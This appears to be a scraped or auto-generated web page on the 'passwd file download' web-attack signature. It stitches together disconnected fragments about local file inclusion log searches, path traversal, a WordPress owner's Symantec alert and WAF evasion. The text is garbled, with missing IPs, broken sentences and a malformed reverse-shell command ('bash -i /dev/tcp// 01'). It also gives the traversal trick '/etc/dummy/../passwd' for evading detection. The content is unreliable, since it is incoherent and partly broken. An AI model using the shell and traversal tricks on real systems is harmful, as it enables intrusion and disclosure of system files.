Web attack: passwd file download attempt






















Event Description: [SID: ] Web Attack: Passwd File Download

In the following figure, we are searching for requests that try to read “/etc/passwd”, which is obviously a Local File Inclusion attempt. As shown in the above screenshot, we have many requests trying for LFI, and these are sent from the IP address These .


The easiest way (with few special characters that could be blocked by WAF) is to use the bash -i command: bash -i /dev/tcp// 01, but unfortunately it is too complicated to bypass all.

Many web applications have file download sections where a user can download one or more files of their choice. If the input is not properly sanitized before being used to retrieve files from the file cabinet or retrieve attachments from a received message or memo, it can be exploited to download arbitrary files from the system via directory.

/etc/passwd may be written as /etc/dummy/../passwd, and both versions are legal. This evasion technique can be used against application code that performs a file download to make it disclose an arbitrary file on the filesystem. Another use of the attack is to evade an IDS looking for well-known patterns in the traffic.


Here is what I got when I visited my WordPress website, bltadwin.ru It looks very interesting and I am wondering what has been detected. Based on the warning message and SID, I am able to find the following details from the Symantec (Broadcom) website: ===== Web Attack: Malicious Theme or Plugin Download 2 Severity:High This attack [ ].
